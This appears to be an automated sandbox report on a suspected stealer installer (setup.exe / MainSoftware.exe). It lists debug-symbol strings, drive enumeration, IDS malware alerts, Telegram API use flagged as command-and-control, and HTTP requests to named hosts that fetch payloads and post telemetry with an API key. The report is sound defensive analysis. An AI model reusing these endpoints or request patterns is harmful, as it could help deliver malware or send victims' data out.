    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37211000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2489300922.0000020F37511000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34474000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000013.00000002.2486648118.0000020F34911000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2486229465.0000020F3447E000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbn source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F35470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000013.00000002.2503638847.0000020F3AA9C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503760658.0000020F3AAB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: MainSoftware.exe, 00000013.00000002.2487355740.0000020F352C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487291255.0000020F35298000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2544800776.000001A505BF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: setup.exe, setup.exe, 00000000.00000002.2599874547.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000000.00000000.1723309056.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000006.00000000.1918855611.00000000005D9000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000006.00000002.2566522747.00000000005D9000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000013.00000002.2502957878.0000020F3A5E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502832383.0000020F3A5CD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000013.00000002.2503502815.0000020F3A671000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503365504.0000020F3A657000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F3773C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490087775.0000020F37741000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000013.00000002.2484894819.000001CE9DE41000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488855338.0000020F373AB000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000013.00000002.2489977509.0000020F37737000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000013.00000002.2485737833.000001CE9F921000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487246699.0000020F35279000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: setup.exe, 00000000.00000003.1996568847.000000000C6CA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000013.00000002.2489367223.0000020F37531000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489300922.0000020F37515000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000013.00000002.2486229465.0000020F34470000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37755000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DF5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503789563.0000020F3AACA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503877554.0000020F3AAE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575358447.000001A50AD5A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: setup.exe, 00000000.00000003.1996568847.000000000D2D5000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2490526230.0000020F377C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1755437103.0000000009AC9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000006.00000003.1932053520.000000000784C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376DA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489851537.0000020F376F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F3775D000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2490316786.0000020F37781000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DFD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489043076.0000020F37463000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489114931.0000020F37491000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489210974.0000020F374E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000013.00000002.2503789563.0000020F3AACA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503877554.0000020F3AAE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575358447.000001A50AD5A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488949645.0000020F373C7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489017313.0000020F373F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000013.00000002.2485624708.000001CE9F8F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485552514.000001CE9F8C9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2539907807.00000164700D9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D6000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: setup.exe, 00000000.00000003.1996568847.000000000C549000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000013.00000000.2458837623.00007FF736428000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000013.00000002.2489560998.0000020F37591000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37577000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37113000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488514061.0000020F37141000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489276519.0000020F37501000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489234377.0000020F374F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Tasks/Release/net8.0-windows/System.Threading.Tasks.pdb source: MainSoftware.exe, 00000018.00000002.2584299572.000001A50B57A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000013.00000002.2489043076.0000020F37463000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489114931.0000020F37491000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000013.00000002.2488437888.0000020F37110000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000013.00000002.2502776162.0000020F3A5B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502635521.0000020F3A5A2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2574402265.000001A50AC51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000013.00000002.2503638847.0000020F3AA9C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503760658.0000020F3AAB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2490472097.0000020F377B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489475473.0000020F37573000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000013.00000002.2487378762.0000020F352E0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487438441.0000020F35301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503137120.0000020F3A601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000013.00000002.2485427774.000001CE9F7A8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485674994.000001CE9F911000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37216000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488782180.0000020F372E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37755000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DF5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000013.00000002.2489453415.0000020F37561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489389183.0000020F3754A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2554946567.000001A507DB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489367223.0000020F37531000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489300922.0000020F37515000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2487133129.0000020F35202000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376DA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489851537.0000020F376F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2489210974.0000020F374E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000013.00000002.2502593462.0000020F3A561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502506832.0000020F3A521000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000013.00000002.2489892751.0000020F37714000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489956997.0000020F37721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000013.00000002.2485338304.000001CE9F783000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485407545.000001CE9F791000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37759000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503137120.0000020F3A601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F3547B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487805041.0000020F354A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: C:\Users\user\Desktop\setup.exeFile opened: z:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: x:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: v:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: t:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: r:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: p:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: n:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: l:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: j:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: h:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: f:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: b:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: y:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: w:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: u:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: s:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: q:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: o:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: m:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: k:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: i:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: g:Jump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile opened: e:Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile opened: c:
    Source: C:\Users\user\Desktop\setup.exeFile opened: a:Jump to behavior
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A03E0 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_004A03E0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004763A0 FindFirstFileW,GetLastError,FindClose,0_2_004763A0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004A2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_004A2630
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_003354C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_003354C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0049C670 FindFirstFileW,FindClose,0_2_0049C670
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_004C0840 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_004C0840
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00485040 FindFirstFileW,FindClose,FindClose,0_2_00485040
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00475A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00475A60
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_003354C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,6_2_003354C0
    Source: C:\Users\user\Desktop\setup.exeCode function: 6_2_00359010 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,6_2_00359010
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49737 -> 172.67.183.127:443
    Source: Network trafficSuricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49739 -> 172.67.183.127:443
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 34.160.111.145 80
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficHTTP traffic detected: POST /install/new HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000Transfer-Encoding: chunkedContent-Type: application/json; charset=utf-8
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 831
    Source: global trafficHTTP traffic detected: GET /install/whattoinstall/89b7e6dd-bc12-46a1-96dc-aded5f1cf453 HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 133
    Source: global trafficHTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1Host: jonatechlab.comX-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 1339
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: jonatechlab.comContent-Type: application/jsonContent-Length: 375
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 178
    Source: global trafficHTTP traffic detected: POST /logs/telemetry HTTP/1.1Host: swiftvantage.onlineContent-Type: application/jsonContent-Length: 276
